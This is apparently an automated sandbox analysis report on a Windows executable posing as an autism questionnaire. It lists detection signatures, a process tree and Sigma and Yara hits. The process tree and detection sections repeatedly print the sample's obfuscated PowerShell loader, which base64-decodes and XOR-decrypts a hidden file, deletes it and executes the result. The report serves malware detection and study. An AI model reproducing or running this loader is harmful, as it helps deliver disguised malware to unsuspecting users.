Windows Analysis Report Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe

Overview

General Information

Sample Name: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe
Analysis ID: 538201
MD5: ae5b37182059c7733466788212370e71
SHA1: e6b0ee285d7042834d23743ad8ca188082ac264f
SHA256: 44af59a2d70ba23f2f80d80090d11184ef923a746c0c9ea3c81922bd8d899346

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Powershell dedcode and execute
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Antivirus / Scanner detection for submitted sample
Sigma detected: Encoded FromBase64String
Sigma detected: Powershell Decrypt And Execute Base64 Data
Initial sample is a PE file and has a suspicious name
Sigma detected: FromBase64String Command Line
Suspicious powershell command line found
Sigma detected: Execution Of Other File Type Than .exe
Obfuscated command line found
Writes many files with high entropy
Powershell creates an autostart link
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Found evasive API chain checking for process token information
Contains functionality to launch a program with higher privileges
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" MD5: AE5B37182059C7733466788212370E71)
    • Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp (PID: 2880 cmdline: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" MD5: 8693B9CFB8B4C466AE12CCDC2FEB46CE)
      • AcroRd32.exe (PID: 6300 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
        • AcroRd32.exe (PID: 5356 cmdline: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf MD5: B969CF0C7B2C443A99034881E8C8740A)
        • RdrCEF.exe (PID: 1304 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
        • RdrCEF.exe (PID: 7608 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7820 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7840 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7884 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 7940 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
          • RdrCEF.exe (PID: 8024 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1 MD5: 9AEBA3BACD721484391D15478A4080C7)
      • powershell.exe (PID: 5516 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5972 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6580 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6612 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6928 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6372 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txt | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txt | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txt | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txt | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |
C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txt | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Encoded FromBase64String
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt 
$25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8
Sigma detected: FromBase64String Command Line
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt 
$25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentProcessId: 2880, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8
Sigma detected: Execution Of Other File Type Than .exe
            Source: Process startedAuthor: Max Altgelt: Data: Command: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, NewProcessName: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, OriginalFileName: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp, ParentCommandLine: "C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ParentImage: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, ParentProcessId: 7084, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe" , ProcessId: 2880
Sigma detected: Non Interactive PowerShell
